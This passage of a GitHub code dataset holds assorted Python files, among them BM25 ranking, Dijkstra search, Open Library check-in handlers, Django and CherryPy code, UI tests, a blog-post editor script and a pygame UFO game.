\n def bm25_ranking(self, keywords, docid_list, returnScore=False):\n \"\"\"\n Ranking a list of documents by BM25 scoring\n\n Args:\n keywords: String -> query contents\n docid_list: List -> a list of document id\n returnScore: Bool -> return the scoring rather than sorting the docid_list\n\n Returns:\n docid_list: List -> a list of document id sorted based on BM25 scheme\n bm25score_list(optional): List -> a list of BM25 scoring, the list will not be ranked if this is returned\n \"\"\"\n term_list = keywords\n bm25score_list = []\n for docid in docid_list:\n sum_of_bm25 = 0\n for term in term_list:\n sum_of_bm25 += self.bm25(Util.to_lowercase(term), docid)\n sum_of_bm25 += self.bm25(Util.stem_data(term), docid)\n bm25score_list.append(sum_of_bm25)\n if returnScore:\n return docid_list, bm25score_list\n return [x for _, x in sorted(zip(bm25score_list, docid_list), reverse=True)]\n","repo_name":"pokaleo/Movie-Index","sub_path":"Code/Backend/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":25619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11889518387","text":"class Calculator:\n\n # self is only for local scope self.num\n # Class name is for global scope Calculator.num or self.num\n\n num = 100\n\n def __init__(self, a, b): # To create a constructor\n self.firstNumber = a\n self.secondNumber = b\n print(\"Constructor Triggered\")\n\n def add(self):\n print(\"I'm not executing a method inside a class\")\n\n def subtract(self):\n var = (self.firstNumber - self.secondNumber) * self.num\n # var = (self.firstNumber - self.secondNumber) * Calculator.num\n return var\n
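\n# Note on the demo below: subtract() evaluates (5 - 3) * 100 = 200, so the\n# script prints the add() message, then 200, then the class attribute 100.\n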
\nobj = Calculator(5, 3) # instantiate an object\nobj.add()\nprint(obj.subtract())\nprint(obj.num)\n","repo_name":"abhmora1011/PythonSelenium","sub_path":"PythonBasics/ObjectOrientedProgramming.py","file_name":"ObjectOrientedProgramming.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28226875688","text":"import cherrypy\nimport re, json\nfrom food_library import _food_database\n\nclass FoodController(object):\n\n def __init__(self, fdb=None):\n if fdb is None:\n self.fdb = _food_database()\n else:\n self.fdb = fdb\n\n self.fdb.load_food('food_data.json') # Load in the JSON data provided on initialization\n\n # Modify and Get our data from the server and send to client requesting\n def GET_KEY(self):\n output = {'result' : 'success'}\n output['foods'] = []\n\n try:\n foods = self.fdb.get_foods()\n output['foods'].append(foods)\n except Exception as ex:\n output['result'] = 'error'\n output['message'] = str(ex)\n\n return json.dumps(output)\n","repo_name":"mmetzge8/OmbreFoodNutritionAPI","sub_path":"WebServer/FoodController.py","file_name":"FoodController.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41570249555","text":"import sys\ninput = sys.stdin.readline\nimport heapq\n\nn, m, r = map(int, input().rstrip().split()) # n : number of regions, m : search range, r : number of roads\nitems = list(map(int, input().rstrip().split()))\nitems.insert(0, 0)\nedge = [[] for _ in range(n + 1)]\nfor _ in range(r) :\n v1, v2, w = map(int, input().rstrip().split())\n edge[v1].append([v2, w])\n edge[v2].append([v1, w])\n\nmax_items = 0 # track the maximum number of items\nINF = sys.maxsize\n\nfor region in range(1, n + 1) :\n dist = [INF] * (n + 1)\n dist[region] = 0\n heap = []\n heapq.heappush(heap, (0, region))\n\n while heap :\n w, v = heapq.heappop(heap)\n\n if w != dist[v] : continue\n\n for nv, nw in edge[v] :\n if dist[nv] > dist[v] + nw :\n dist[nv] = dist[v] + nw\n heapq.heappush(heap, (dist[nv], nv))\n\n tmp = 0\n for i in range(1, n + 1) :\n if dist[i] <= m : tmp += items[i]\n\n if tmp > max_items : max_items = tmp\n\nprint(max_items)\n","repo_name":"zeomzzz/python-coding-test","sub_path":"BOJ/Gold/14938.py","file_name":"14938.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2470069287","text":"\"\"\"Reading log check-ins handler and services.\n\"\"\"\nimport json\nimport web\n\nfrom typing import Optional\n\nfrom infogami.utils import delegate\nfrom infogami.utils.view import public\n\nfrom openlibrary.accounts import get_current_user\nfrom openlibrary.utils import extract_numeric_id_from_olid\nfrom openlibrary.core.bookshelves_events import BookshelfEvent, BookshelvesEvents\nfrom openlibrary.utils.decorators import authorized_for\n\n\ndef make_date_string(year: int, month: Optional[int], day: Optional[int]) -> str:\n \"\"\"Creates a date string in the expected format, given the year, month, and day.\n\n Event dates can take one of three forms:\n \"YYYY\"\n \"YYYY-MM\"\n \"YYYY-MM-DD\"\n \"\"\"\n result = f'{year}'\n if month:\n result += f'-{month:02}'\n if day:\n result += f'-{day:02}'\n return result\n\n\ndef is_valid_date(year: int, month: Optional[int], day: Optional[int]) -> bool:\n \"\"\"Validates dates.\n\n Dates are considered valid if there is:\n 1. A year\n 2. A year and a month\n 3. 
A year, month, and day\n \"\"\"\n if not year:\n return False\n if day and not month:\n return False\n return True\n\n\n@public\ndef get_latest_read_date(work_olid: str, edition_olid: str | None) -> str | None:\n user = get_current_user()\n username = user['key'].split('/')[-1]\n\n work_id = extract_numeric_id_from_olid(work_olid)\n edition_id = extract_numeric_id_from_olid(edition_olid) if edition_olid else None\n\n result = BookshelvesEvents.get_latest_event_date(\n username, work_id, edition_id, BookshelfEvent.FINISH\n )\n return result\n\n\nclass patron_check_ins(delegate.page):\n path = r'/works/OL(\\d+)W/check-ins'\n encoding = 'json'\n\n @authorized_for('/usergroup/beta-testers')\n def POST(self, work_id):\n \"\"\"Validates data, constructs date string, and persists check-in event.\n\n Data object should have the following:\n event_type : number\n year : number\n month : number : optional\n day : number : optional\n edition_key : string : optional\n event_id : int : optional\n \"\"\"\n data = json.loads(web.data())\n\n if not self.validate_data(data):\n raise web.badrequest('Invalid date submitted')\n\n user = get_current_user()\n username = user['key'].split('/')[-1]\n\n edition_key = data.get('edition_key', None)\n edition_id = extract_numeric_id_from_olid(edition_key) if edition_key else None\n\n event_type = data.get('event_type')\n\n date_str = make_date_string(\n data.get('year', None),\n data.get('month', None),\n data.get('day', None),\n )\n\n event_id = data.get('event_id', None)\n\n if event_id:\n # update existing event\n if not BookshelvesEvents.exists(event_id):\n raise web.notfound('Check-in event unavailable for edit')\n BookshelvesEvents.update_event_date(event_id, date_str)\n else:\n # create new event\n result = BookshelvesEvents.create_event(\n username, work_id, edition_id, date_str, event_type=event_type\n )\n\n event_id = result\n\n return delegate.RawText(json.dumps({'status': 'ok', 'id': event_id}))\n\n def validate_data(self, data):\n \"\"\"Validates data submitted from check-in dialog.\"\"\"\n\n # Event type must exist:\n if 'event_type' not in data:\n return False\n\n # Date must be valid:\n if not is_valid_date(\n data.get('year', None),\n data.get('month', None),\n data.get('day', None),\n ):\n return False\n\n return True\n\n\nclass patron_check_in(delegate.page):\n path = r'/check-ins/(\\d+)'\n\n @authorized_for('/usergroup/beta-testers')\n def DELETE(self, check_in_id):\n # TODO: Check for authorization after removing authorized_for decorator\n if not BookshelvesEvents.exists(check_in_id):\n raise web.notfound('Event does not exist')\n BookshelvesEvents.delete_by_id(check_in_id)\n return web.ok()\n\n\ndef setup():\n pass\n","repo_name":"pandemic-patch/openlibrary","sub_path":"openlibrary/plugins/upstream/checkins.py","file_name":"checkins.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"27671479451","text":"from typing import List\n\n\ndef all_construct(target_str: str, word_bank: List) -> List:\n \"\"\"\n :param target_str: target string\n :param word_bank: List of words\n :return: List containing all possible ways to generate target_str using words from word_bank.\n \"\"\"\n\n if target_str == '':\n return [[]]\n\n result = []\n\n for word in word_bank:\n if target_str.startswith(word):\n # rem_string = target_str.replace(str, '')\n suffix = target_str[len(word):]\n suffix_ways = all_construct(suffix, word_bank)\n target_ways = [[word] + el for el in 
suffix_ways]\n result.extend(target_ways)\n return result\n\n\nif __name__ == \"__main__\":\n print(all_construct('purple', ['purp', 'p', 'ur', 'le', 'purp']))\n","repo_name":"shubhamwagh/dynamic_programming_python","sub_path":"src/recursion/all_construct.py","file_name":"all_construct.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7231420304","text":"#!/usr/bin/python3\n# encoding:utf-8\n'''\nEdit files whose names contain the provided string.\n'''\n\nimport os\nimport re\nimport sys\nimport glob\nimport codecs\nimport datetime\n\n\ndef help_msg():\n \"\"\"Print help message\"\"\"\n print('''\n usage: ed.py [hotvrRa] PATTERN\n\n Edit files whose names contain the provided string.\n\n positional arguments:\n PATTERN Default: Edit file with PATTERN in name\n\n optional arguments:\n -h, show this help message and exit\n o, output filename\n v, view file without change\n r, remove file with PATTERN in name\n R, rename file with PATTERN in name\n a, add file\n ''')\n\n\ndef add(argv):\n \"\"\"Add new file\"\"\"\n categories = ['法', '理', '器', '用', '杂']\n head = '---\\nlayout: {}\\n' \\\n 'title: {}\\n' \\\n 'category: {}\\n' \\\n 'date: %Y-%m-%d %H:%M:%S +0800\\n' \\\n 'create: %Y-%m-%d %H:%M:%S +0800\\n' \\\n 'tags: \\n'\\\n ' - \\n' \\\n '---\\n\\n' \\\n '- TOC\\n' \\\n '{{:toc}}'\n\n now = datetime.datetime.now()\n date = now.strftime('%Y-%m-%d')\n\n filename = '_posts' + os.path.sep + date + '-{}.md'.format('-'.join(argv))\n\n for num, category in enumerate(categories):\n print('{}: {}'.format(num, category))\n\n index = input('Please select a category[0]: ')\n\n if index != '':\n index = int(index)\n else:\n index = 0\n\n title = input('Input title: ')\n\n if not os.path.exists(filename):\n with codecs.open(filename, 'w', 'utf-8') as file_write:\n file_write.write(now.strftime(head).format('post',\n title,\n categories[index]))\n\n os.system('vim \"' + filename + '\"')\n\n\ndef determ_file(patterns, case=re.I):\n '''Determine which file to edit'''\n files = glob.glob('_posts' + os.path.sep + '*.md')\n pattern = '.*'.join(patterns)\n\n edit_files = list(filter(lambda x: re.findall(pattern, x, case), files))\n\n index = 0\n\n if len(edit_files) > 1:\n for i, filename in enumerate(edit_files):\n print('{}: {}'.format(i, filename))\n index = input('Please select a file[0]: ')\n if index != '':\n index = int(index)\n else:\n index = 0\n return '\"' + edit_files[index] + '\"'\n elif len(edit_files) == 1:\n return '\"' + edit_files[index] + '\"'\n else:\n return None\n\n\ndef main(argv):\n \"\"\"Main function\"\"\"\n if not argv or '-h' in argv:\n help_msg()\n elif argv[0] == 'a':\n add(argv[1:])\n elif argv[0] == 'r':\n file_name = determ_file(argv[1:])\n answer = input('Delete {}?[y/N] '.format(file_name))\n if answer in 'yY':\n os.remove(file_name)\n elif argv[0] == 'R':\n file_name = determ_file(argv[1:])\n answer = input('Rename {}?[y/N] '.format(file_name))\n if answer in 'yY':\n new_name = input('Input newname: ')\n new_name = file_name[:10] + '-{}.md'.format(\n new_name.replace(' ', '-'))\n os.rename(file_name, new_name)\n elif argv[0] == 'v':\n file_name = determ_file(argv[1:])\n os.system('vim -M ' + file_name)\n elif argv[0] == 'o':\n file_name = determ_file(argv[1:])\n print(file_name)\n else:\n file_name = determ_file(argv)\n if file_name is not None:\n os.system('vim ' + file_name)\n else:\n add(argv)\n\n\nif __name__ == '__main__':\n 
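# Illustrative invocations (a sketch based on the help text above):\n # python ed.py a my new post -> prompt for a category and title, then edit\n # python ed.py v PATTERN -> view the matching post without change\n 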
main(sys.argv[1:])\n","repo_name":"zYeoman/zYeoman.github.io","sub_path":"ed.py","file_name":"ed.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"4926684888","text":"from django.core.management.base import BaseCommand\nfrom scheduling.models import Event\nfrom datetime import datetime\n\n\nclass Command(BaseCommand):\n \"\"\"Expire old events\"\"\"\n\n help = \"Expires events that have already occurred\"\n requires_system_checks = False\n\n def handle(self, *args, **options):\n events = Event.objects.filter(expired=False,\n end_time__lt=datetime.now())\n self.stdout.write(self.style.SUCCESS(\n \"{} Found [{}] events.\".format(\n datetime.now().strftime('%a %d-%b-%y %H-%M-%S'),\n str(len(events)))))\n for event in events:\n event.expired = True\n event.save()\n self.stdout.write(self.style.SUCCESS(\n '{} Expired [{}] events.'.format(\n datetime.now().strftime('%a %d-%b-%y %H-%M-%S'),\n len(events))))","repo_name":"mutaku/bookit","sub_path":"bookit_django/scheduling/management/commands/expire_events.py","file_name":"expire_events.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5451310048","text":"from pages.main_page import MainPage\nfrom pages.categories_page import CategoriesPage\nfrom pages.subcategory_page import SubcategoryPage\nfrom pages.cart_page import CartPage\nimport allure\n\n\n@allure.feature(\"Check the user can add products to cart and remove them\")\ndef test_add_products_to_cart_and_remove_them(browser, test_case_2_data):\n with allure.step(\"Open main page\"):\n main_page = MainPage(browser)\n main_page.open_main_page()\n with allure.step(\"Open categories page\"):\n main_page.open_categories_page()\n\n with allure.step(\"Check categories page is displayed\"):\n categories_page = CategoriesPage(browser)\n categories_page.categories_page(test_case_2_data)\n with allure.step(\"Open subcategory_page\"):\n categories_page.open_subcategory_page()\n\n with allure.step(\"Check subcategory page is displayed\"):\n subcategory_page = SubcategoryPage(browser)\n subcategory_page.subcategory_page(test_case_2_data)\n with allure.step(\"Check the user can add a product to cart\"):\n subcategory_page.add_to_cart(test_case_2_data)\n with allure.step(\"Open cart page\"):\n subcategory_page.open_cart_page()\n\n with allure.step(\"Check cart page is displayed\"):\n cart_page = CartPage(browser)\n cart_page.cart_page(test_case_2_data)\n with allure.step(\"Check the user can add products and update the order\"):\n cart_page.add_products_and_update_order(test_case_2_data)\n with allure.step(\"Check the user can remove products from the cart\"):\n cart_page.cart_is_empty(test_case_2_data)\n","repo_name":"KseniyaLikhtarovich/project_final_auto_python","sub_path":"tests/litecart_tests/test_product_cart.py","file_name":"test_product_cart.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16767959821","text":"from math import factorial\n\ndef binomial(x, y):\n try:\n return factorial(x) / (factorial(y) * factorial(x - y))\n except ValueError:\n return 0\n\ndef pascals_triangle(number_of_rows):\n triangle = []\n \n if number_of_rows <= 0:\n return None\n else:\n for row in range(number_of_rows+1):\n triangle.append([binomial(row, column) for column in range(row+1)])\n return triangle\n\nx 
= int(input(\"Enter number of rows : \"))\nresult = pascals_triangle(x)\nfor i in range(0, len(result)):\n print(*result[i])","repo_name":"irvaniali79/Python_Assignments","sub_path":"Assignment_15/PascalTrainagle.py","file_name":"PascalTrainagle.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"18536575638","text":"from uuid import uuid4\nimport session\nfrom session import Session, SessionException, IRodsEnv\n\n\nclass ICommands():\n\n def __init__(self, option=None):\n pass\n\n def set_user_session(self, username=None, password=None, host=None,\n port=None, def_res=None, zone=None,\n userid=0, sess_id=None):\n homedir = \"/\" + zone + \"/home/\" + username\n userEnv = IRodsEnv(\n pk=userid,\n host=host,\n port=port,\n def_res=def_res,\n home_coll=homedir,\n cwd=homedir,\n username=username,\n zone=zone,\n auth=password,\n irods_default_hash_scheme='MD5'\n )\n if sess_id is None:\n self.session = Session(session_id=uuid4())\n self.environment = self.session.create_environment(myEnv=userEnv)\n else:\n self.session = Session(session_id=sess_id)\n if self.session.session_file_exists():\n self.environment = userEnv\n else:\n self.environment = self.session.create_environment(myEnv=userEnv)\n\n self.session.run('iinit', None, self.environment.auth)\n session.ACTIVE_SESSION = self.session\n\n\n def delete_user_session(self):\n if self.session.session_file_exists():\n self.session.delete_environment()\n\n\n def getFile(self, src_name, dest_name):\n self.session.run(\"iget\", None, '-f', src_name, dest_name)\n\n\n\n def exists(self, name):\n try:\n stdout = self.session.run(\"ils\", None, name)[0]\n return stdout != \"\"\n except SessionException:\n return False\n\n def listdir(self, path):\n stdout = self.session.run(\"ils\", None, path)[0].split(\"\\n\")\n listing = ([], [])\n directory = stdout[0][0:-1]\n directory_prefix = \" C- \" + directory + \"/\"\n for i in range(1, len(stdout)):\n if stdout[i][:len(directory_prefix)] == directory_prefix:\n dirname = stdout[i][len(directory_prefix):].strip()\n if dirname:\n listing[0].append(dirname)\n else:\n filename = stdout[i].strip()\n if filename:\n listing[1].append(filename)\n return listing\n\n def size(self, name):\n stdout = self.session.run(\"ils\", None, \"-l\", name)[0].split()\n return int(stdout[3])\n","repo_name":"hydroshare/tethys_in_docker","sub_path":"tethys_main/icommands_client/icommands.py","file_name":"icommands.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12061447205","text":"# Initial state of boxes\nboxes = {\n 0: [],\n 1: ['guitar', 'note', 'toothpaste', 'tie'],\n 2: ['wire', 'train', 'pillow', 'desert'],\n 3: ['lock', 'grass', 'plate', 'bag'],\n 4: ['starfish', 'motorcycle', 'blanket', 'beach', 'sandals'],\n 5: [],\n 6: ['jungle', 'clock'],\n 7: ['soap', 'book', 'card'],\n 8: ['river', 'sculpture', 'rain', 'skirt', 'mountain'],\n 9: ['necklace', 'pants', 'dice', 'rocket', 'helmet']\n}\n\n# Empty Box 1.\nboxes[1] = []\n\n# Replace the desert and the train with the magnet and the usb in Box 2.\nboxes[2].remove('desert')\nboxes[2].remove('train')\nboxes[2].append('magnet')\nboxes[2].append('usb')\n\n# Replace the pants and the helmet with the skirt and the lightning in Box 9.\nboxes[9].remove('pants')\nboxes[9].remove('helmet')\nboxes[9].append('skirt')\nboxes[9].append('lightning')\n\n# Replace the clock with the 
leaf in Box 6.\nboxes[6].remove('clock')\nboxes[6].append('leaf')\n\n# Move the magnet and the pillow from Box 2 to Box 8.\nitems_to_move = ['magnet', 'pillow']\nfor item in items_to_move:\n boxes[2].remove(item)\n boxes[8].append(item)\n\n# Put the headphone and the glasses into Box 8.\nboxes[8].append('headphone')\nboxes[8].append('glasses')\n\n# Empty Box 2.\nboxes[2] = []\n\n# Move the leaf from Box 6 to Box 9.\nboxes[6].remove('leaf')\nboxes[9].append('leaf')\n\n# Put the ocean and the comb into Box 6.\nboxes[6].append('ocean')\nboxes[6].append('comb')\n\n# Replace the comb and the ocean and the jungle with the cloud and the note and the makeup in Box 6.\nboxes[6].remove('comb')\nboxes[6].remove('ocean')\nboxes[6].remove('jungle')\nboxes[6].append('cloud')\nboxes[6].append('note')\nboxes[6].append('makeup')\n\n# Move the dice from Box 9 to Box 8.\nboxes[9].remove('dice')\nboxes[8].append('dice')\n\n# Remove the note and the cloud and the makeup from Box 6.\nboxes[6].remove('note')\nboxes[6].remove('cloud')\nboxes[6].remove('makeup')\n\n# Put the guitar and the helmet and the bracelet into Box 6.\nboxes[6].append('guitar')\nboxes[6].append('helmet')\nboxes[6].append('bracelet')\n\n# Move the bracelet and the helmet and the guitar from Box 6 to Box 2.\nitems_to_move = ['bracelet', 'helmet', 'guitar']\nfor item in items_to_move:\n boxes[6].remove(item)\n boxes[2].append(item)\n\n# Empty Box 8.\nboxes[8] = []\n\n# Print the boxes\nfor box_number, items in boxes.items():\n print(f\"Box {box_number}: {items}\")","repo_name":"NLP-KU/fulgid","sub_path":"boxes/results/complex-boxes-dataset/code/gpt-3.5-turbo/1d0953ab10.py","file_name":"1d0953ab10.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73574609715","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\n\n\n# In[3]:\n\n\nimport pandas as pd\n\n\n# In[4]:\n\n\nimport json\nimport sys\n\n\n# import argparse\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"-fn\", dest=\"filePath\", type=str, required=True)\n# args = parser.parse_args()\n\n# In[5]:\n\n\n# filePath = '../../labeled_document2.json'\n\n\n# In[6]:\n\nwith open(sys.argv[1]) as f:\n data = json.load(f)\n\nwith open(sys.argv[2]) as f:\n data_iter2 = json.load(f)\n\n\n# In[10]:\n\n\nnegativeComment = None\npositiveComment = None\nfor i in range(len(data['Comment'])):\n if data['CommentLabel'][i] == 0:\n negativeComment = np.array([[data['Comment'][i],0]]) if negativeComment is None else np.append(negativeComment,[[data['Comment'][i],0]],0)\n else:\n positiveComment = np.array([[data['Comment'][i],1]]) if positiveComment is None else np.append(positiveComment,[[data['Comment'][i],1]],0)\n\n\nfor i in range(len(data_iter2['Comment'])):\n if data_iter2['CommentLabel'][i] == 0:\n negativeComment = np.append(negativeComment,[[data_iter2['Comment'][i],0]],0)\n else:\n positiveComment = np.append(positiveComment,[[data_iter2['Comment'][i],1]],0)\n\n\n# In[11]:\nindexes = np.random.choice(positiveComment.shape[0],negativeComment.shape[0],replace=False)\n\nconcatComment = np.concatenate((positiveComment[indexes],negativeComment),axis=0)\n# concatComment = np.concatenate((positiveComment,negativeComment),axis=0)\n\n# print (len(positiveComment) + len(negativeComment))\ndataframe = 
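The box-tracking entry above repeats the same remove/append pattern dozens of times; for illustration only, the two recurring operations factored into helpers (`move_items` and `replace_items` are hypothetical names, not from the record):

def move_items(boxes, items, src, dst):
    for item in items:
        boxes[src].remove(item)   # raises ValueError if the item is absent
        boxes[dst].append(item)

def replace_items(boxes, box, old, new):
    for item in old:
        boxes[box].remove(item)
    boxes[box].extend(new)

boxes = {2: ['wire', 'train', 'pillow', 'desert'], 8: []}
replace_items(boxes, 2, ['desert', 'train'], ['magnet', 'usb'])
move_items(boxes, ['magnet', 'pillow'], src=2, dst=8)
print(boxes)  # {2: ['wire', 'usb'], 8: ['magnet', 'pillow']}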
pd.DataFrame(concatComment)\ndataframe.to_csv('./labeled_comments.csv',header=False,index=False)\n","repo_name":"alanzhang88/SONegativeCommentDetection","sub_path":"models/CNN/embeddings/convertJsontoCSV.py","file_name":"convertJsontoCSV.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"4652727218","text":"import pygame\nimport random\nfrom sprites import Missile\nfrom sprites import UFO\nfrom sprites import Beam\nfrom sprites import Human\nfrom sprites import House\nfrom sprites import Building\n\n# game play mode\nclass Game(object):\n \n# loads the images needed for game\n def images(self):\n self.heart = pygame.image.load('images/Heart.png').convert_alpha()\n self.heart = pygame.transform.scale(self.heart,(30,30))\n self.explode=pygame.image.load('images/explosion.png').convert_alpha()\n self.explode=pygame.transform.scale(self.explode,(80,80))\n\n# loads the sounds needed for game \n def sounds(self):\n self.explosion=pygame.mixer.Sound('sound/explosion.ogg')\n self.gameover=pygame.mixer.Sound('sound/gameover.wav')\n self.gameclear=pygame.mixer.Sound('sound/gameclear.wav')\n self.beamSound=pygame.mixer.Sound('sound/ufo.wav')\n self.beamSound.set_volume(0.2)\n self.pickUp=pygame.mixer.Sound('sound/score.wav')\n \n def __init__(self,highScore):\n self.images()\n self.sounds()\n self.player=UFO(3)\n self.gauge=0\n self.score=0\n self.ufoSize=80\n self.highScore=highScore\n self.font=pygame.font.SysFont(\"Comic Sans MS\", 50)\n self.miniFont=pygame.font.SysFont(\"Comic Sans MS\", 25)\n self.life=self.font.render(\"LIFE\", False, (0, 0, 0))\n self.largeFont=pygame.font.SysFont(\"Comic Sans MS\", 140)\n self.text=self.largeFont.render(\"PAUSED\",False,(0,0,0))\n self.textCoords=(100,150)\n self._keys = dict()\n self.gameOver=False\n self.gameClear=False\n self.pause=False\n self.detectP=False\n self.time=0\n self.drawBeam=False\n self.number=0\n self.missileList=pygame.sprite.Group()\n self.humans=pygame.sprite.Group()\n self.houses=pygame.sprite.Group()\n self.buildings=pygame.sprite.Group()\n self.beam=Beam()\n\n# plays bgm\n def playMusic(self):\n pygame.mixer.music.load('sound/gameBGM.ogg')\n pygame.mixer.music.play(-1)\n\n# when called, generates a missile at a random location and adds to sprite group\n def spawnMissiles(self):\n direction=random.randint(0,1)\n yCoord=random.randint(120,290)\n spawn=Missile(yCoord,direction)\n self.missileList.add(spawn)\n\n# generates targets on screen when game starts \n def setScreen(self):\n if self.time==0:\n for i in range(0,10):\n number=random.randint(1,30)*20\n which=random.randint(1,60)\n person=Human(number,self.player)\n house=House(number,self.player)\n building=Building(number,self.player)\n if which>=30:\n self.humans.add(person)\n elif which>=10 and which<30:\n self.houses.add(house)\n else:\n self.buildings.add(building)\n \n# when called, generates targets at random timings and adds to sprite group\n def spawnTargets(self):\n number=random.randint(1,500)\n if number<200:\n person=Human(600,self.player)\n self.humans.add(person)\n if number<300 and number>200:\n house=House(600,self.player)\n self.houses.add(house)\n if number>450:\n building=Building(600,self.player)\n self.buildings.add(building)\n \n# checks keys pressed and lifted in order to control ufo and beam \n def keys(self):\n if self.pause:\n keys=pygame.key.get_pressed()\n if keys[pygame.K_p]:\n if self.detectP==False:\n if self.pause==False:\n 
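The `convertJsontoCSV.py` entry above balances classes by undersampling the positive comments with `np.random.choice(..., replace=False)`. A self-contained sketch of just that step, with synthetic data standing in for the labeled comments (the seed and array contents are assumptions for the demo):

import numpy as np

rng = np.random.default_rng(0)
positive = np.array([[f'pos comment {i}', 1] for i in range(100)], dtype=object)
negative = np.array([[f'neg comment {i}', 0] for i in range(30)], dtype=object)

# Draw exactly len(negative) positives without replacement, then stack.
idx = rng.choice(positive.shape[0], negative.shape[0], replace=False)
balanced = np.concatenate((positive[idx], negative), axis=0)
print(balanced.shape)  # (60, 2) -- 30 positives + 30 negatives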
pygame.mixer.music.pause()\n self.pause=True\n else:\n pygame.mixer.music.unpause()\n self.pause=False\n self.detectP=True\n if not keys[pygame.K_p]:\n self.detectP=False\n else:\n keys=pygame.key.get_pressed()\n self.speed=5\n if keys[pygame.K_SPACE]:\n if self.player.invincible==False:\n pygame.mixer.Channel(0).play(self.beamSound,loops=-1)\n self.drawBeam=True\n if self.drawBeam:\n self.speed=2\n if keys[pygame.K_UP]:\n if self.player.y>65:\n self.player.update(y=-self.speed)\n self.beam.update(y=-self.speed)\n if keys[pygame.K_DOWN]:\n if (self.player.y+self.ufoSize)<300:\n self.player.update(y=self.speed)\n self.beam.update(y=self.speed)\n if keys[pygame.K_RIGHT]:\n if (self.player.x+self.ufoSize)<600:\n self.player.update(x=self.speed)\n self.beam.update(x=self.speed)\n if keys[pygame.K_LEFT]:\n if self.player.x>0:\n self.player.update(x=-self.speed)\n self.beam.update(x=-self.speed)\n if not keys[pygame.K_SPACE]:\n self.beamSound.stop()\n if keys[pygame.K_p]:\n if self.detectP==False:\n if self.pause==False:\n self.beamSound.stop()\n pygame.mixer.music.pause()\n self.pause=True\n else:\n pygame.mixer.music.unpause()\n self.pause=False\n self.detectP=True\n if not keys[pygame.K_p]:\n self.detectP=False\n\n# controls everything dependent on time, including updating sprites and spawning\n def timerFired(self, dt):\n if self.pause:\n pass\n else:\n self.setScreen()\n self.missileList.explosion=False\n self.drawBeam=False\n self.time+=1\n self.number=random.randint(1,10)\n self.keys()\n if self.player.livesLeft<=0:\n self.gameover.play()\n self.gameOver=True\n return\n if self.time%100==0:\n if self.number>3:\n self.spawnMissiles()\n if self.time%30==0:\n self.spawnTargets()\n self.missileList.update(self.player,self.beam,self.explosion,\\\n self.time)\n if self.time%2==0:\n self.humans.update(self.drawBeam,self.player,self.beam,\\\n self.pickUp)\n self.houses.update(self.drawBeam,self.player,self.beam,\\\n self.pickUp)\n self.buildings.update(self.drawBeam,self.player,self.beam,\\\n self.pickUp)\n self.score=self.player.score\n self.gauge=self.player.gauge\n if self.score>self.highScore:\n self.highScore=self.score\n if self.gauge==400:\n self.gameclear.play()\n self.score+=(self.player.livesLeft*500)\n if self.score>self.highScore:\n self.highScore=self.score\n self.gameClear=True\n if self.player.killed!=0 and self.time<(self.player.killed+45) and \\\n self.time>self.player.killed:\n self.beamSound.stop()\n self.player.invincible=True\n else:\n self.player.invincible=False\n \n# draws the hearts/lives on the screen\n def drawLife(self,screen):\n if self.player.livesLeft>2:\n screen.blit(self.heart,(180,10))\n if self.player.livesLeft>1:\n screen.blit(self.heart,(140,10))\n if self.player.livesLeft>0:\n screen.blit(self.heart,(100,10))\n \n def getEvent(self):\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n pass\n\n# draws the game screen \n def redrawAll(self, screen):\n self.scoreText=self.miniFont.render\\\n (\"SCORE %d\" % self.score,False,(0,0,0))\n self.highScoreText=self.miniFont.render\\\n (\"HIGH SCORE %d\" % self.highScore,False,(0,0,0))\n screen.fill((255,255,255))\n if self.player.invincible==False:\n screen.blit(self.player.image,self.player.rect)\n else:\n if self.player.killed!=0 and self.time<(self.player.killed+10)\\\n and self.time>self.player.killed:\n screen.blit(self.explode,(self.player.x,self.player.y))\n if self.time%5==0:\n screen.blit(self.player.image,self.player.rect)\n screen.blit(self.life,(10,10))\n 
